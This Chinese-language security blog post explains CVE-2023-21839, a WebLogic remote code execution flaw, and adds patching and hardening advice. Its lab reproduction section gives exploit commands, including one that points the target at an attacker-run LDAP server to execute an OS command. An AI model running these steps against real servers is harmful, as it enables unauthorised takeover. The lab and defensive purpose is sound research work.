威斯尼斯人(wns2299cn·China认证)官网-Make Life Better

安全研究 | 如何有效保护Weblogic服务器免受CVE-2023-21839攻击

2023-03-24 来源:威斯尼斯人wns2299cn

Weblogic简介


随着网络技术的发展和应用范围的扩大,Weblogic服务器作为一种常用的应用服务器,在企业中广泛应用。然而,Weblogic服务器也面临着来自黑客的攻击威胁,而CVE-2023-21839作为最新的漏洞已经被公开,需要我们采取有效措施来保护Weblogic服务器免受攻击。


CVE-2023-21839详解


CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,未经身份验证的远程攻击者能够利用该漏洞,通过T3/IIOP协议网络访问脆弱的Weblogic服务器,可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。


1.漏洞原理:


T3/IIOP协议支持远程绑定对象bind到服务端,而且可以通过lookup代码c.lookup(“xxxxxx”);  查看。远程对象继承自OpaqueReference并lookup查看远程对象时,服务端会调用远程对象getReferent方法。由于

weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并实现getReferent方法,存在

retVal = context.lookup(this.remoteJNDIName)实现,所以能够通过RMI/LDAP远程协议进行远程命令执行。


2.影响范围:


Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0


3.漏洞复现:


靶机环境:Docker vulhub

攻击机环境:Windows10

靶机IP为192.168.50.188


微信图片_20230324182327.png


图片 1:目标机ip


靶机需要提前搭建docker、docker-compose、vulhub,随后在CVE-2023-21839目录下启动环境:docker-compose up -d


微信图片_20230324182455.png

图片 2 :docker环境搭建


靶机访问hxxp://192.168.50.188:7001/console/login/LoginForm.jsp,确认环境已成功搭建。


1679653539412592.png

图片 3:环境搭建完成


攻击机IP为192.168.50.17


微信图片_20230324182617.png

图片 4:攻击机ip


把用go语言编写的漏洞利用exp编译成exe(需要go语言环境):go build -o CVE-2023-21839.exe


微信图片_20230324182650.png

图片 5:攻击机使用go将exp编译成exe


根据payload利用工具提示,构造ldap语句:java -jar xxx.jar -u


微信图片_20230324182732.png

图片 6:payload利用工具提示


启动payload利用工具:java -jar xxx.jar --ip 192.168.50.17


微信图片_20230324182819.png

图片 7:启用payload利用工具


利用exp进行复现漏洞,创建powershell.txt文件:CVE-2023-21839.exe -ip 192.168.50.188 -port 7001 -ldap ldap://192.168.50.17:1389/Basic/Command/touch%20powershell.txt


微信图片_20230324182908.png

图片 8:执行语句


在靶机上验证powershell.txt是否已被成功创建,能够看到powershell.txt确实已被成功创建。


1679654105929620.png

图片9:目标机结果


关闭靶机环境。


1679654150191091.png

图片 10:目标机关闭漏洞环境


防护建议


CVE-2023-21839这一漏洞允许攻击者远程执行代码,获取服务器权限,会对企业网络和数据造成严重损失。因此,威斯尼斯人wns2299cn安全研究院建议您采取以下有效措施来保护Weblogic服务器免受攻击:


首先,我们需要对Weblogic服务器进行深入的漏洞分析,了解漏洞的本质和可能产生的影响。通过分析漏洞的原理,我们可以找到漏洞的入口点,并尝试利用漏洞实现远程执行代码,以验证漏洞的有效性。在确认漏洞确实存在之后,我们需要尽快采取关闭T3和iiop协议端口等有效措施来防止攻击。


其次,我们需要寻找并安装相应的补丁程序。由于漏洞是由软件程序中的错误导致的,因此软件供应商通常会在发现漏洞后发布相应的补丁程序。我们需要及时查找并安装这些补丁程序,以修复漏洞并增强服务器的安全性。对该情况而言,可以参考Oracle手册,安装Oracle Weblogic Server最新安全补丁,详见网址:


https://www.oracle.com/security-alerts/cpujan2023.html


第三,我们需要对Weblogic服务器进行安全加固和配置调整。安全加固可以帮助我们识别并修复潜在的安全漏洞,包括限制服务器访问权限、修改默认用户名和密码、关闭不必要的服务和端口等。此外,我们还需要对服务器的配置进行调整,以提高服务器的安全性和稳定性。


最后,我们需要加强人员的安全意识和培训。由于Weblogic服务器的安全性需要人员的共同维护,安全意识和培训包括教育用户采用强密码、不随意打开附件、不信任来路不明的链接等,以防范攻击者通过钓鱼等手段获取服务器权限。


综上所述,对于CVE-2023-21839这一漏洞,我们需要采取多重措施来保护Weblogic服务器的安全性。包括深入分析漏洞、寻找并安装补丁程序、进行安全加固和配置调整,以及加强人员的安全意识和培训。只有通过综合手段加强Weblogic服务器的安全性,才能有效防范黑客攻击,保护企业网络和数据的安全。



ISO9001

质量管理体系认证

ISO14001

环境管理体系认证

ISO27001

信息安全管理体系认证

ISO20000

信息技术服务管理体系认证

信息系统

安全运维服务资质